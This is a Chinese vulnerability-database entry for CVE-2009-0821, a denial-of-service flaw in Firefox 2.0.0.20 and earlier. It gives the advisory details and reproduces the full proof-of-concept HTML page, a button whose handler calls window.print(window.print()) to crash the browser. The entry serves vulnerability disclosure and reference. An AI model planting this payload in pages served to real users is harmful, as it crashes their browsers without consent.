Mozilla Firefox Nested 'window.print()' 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117439 漏洞类型 资源管理错误
发布时间 2009-03-03 更新时间 2009-03-05
CVE编号 CVE-2009-0821 CNNVD-ID CNNVD-200903-102
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/32836
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-102
|漏洞详情
Firefox是Mozilla所发布的开放源码WEB浏览器。MozillaFirefox2.0.0.20版本及其早期版本允许远程攻击者可以借助对window.print函数的嵌套式的调用,造成拒绝服务(应用程序崩溃),例如通过一个INPUT元件的onclick属性中的window.print(window.print())。
|漏洞EXP
source: http://www.securityfocus.com/bid/33969/info

Mozilla Firefox is prone to a remote denial-of-service vulnerability.

Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions.

Firefox 2.0.0.20 is vulnerable; other versions may also be affected.

<HTML><TITLE>FireFox Print() Function Malform input Crash</TITLE><BODY> <p1>--------------In The Name Of God---------------<br> <p1>---------Apa Center Of Yazd University---------<br> <p1>-------------Http://Www.Ircert.Cc--------------<br> <br>Tested On : FireFox <= 2.0.0.20 Fully Update <br>Note : If the browser alert for print choose cancel <br> <br>Author : b3hz4d (Seyed Behzad Shaghasemi) <br>Site : Www.DeltaHacking.Net <br>Date : 3 Mar 2009 <br>Contact: behzad_sh_66@yahoo.com <br>Special Thanks To : Str0ke, Dr.trojan, Cru3l.b0y, PLATEN, Bl4ck.Viper, Irsdl And all Iranian hackers </p1><br><br> <form> <input type="button" value="bo0o0o0om" onClick="window.print(window.print())" /> </form> </BODY></HTML>
|参考资料

来源:BID
名称:33969
链接:http://www.securityfocus.com/bid/33969
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/33969.html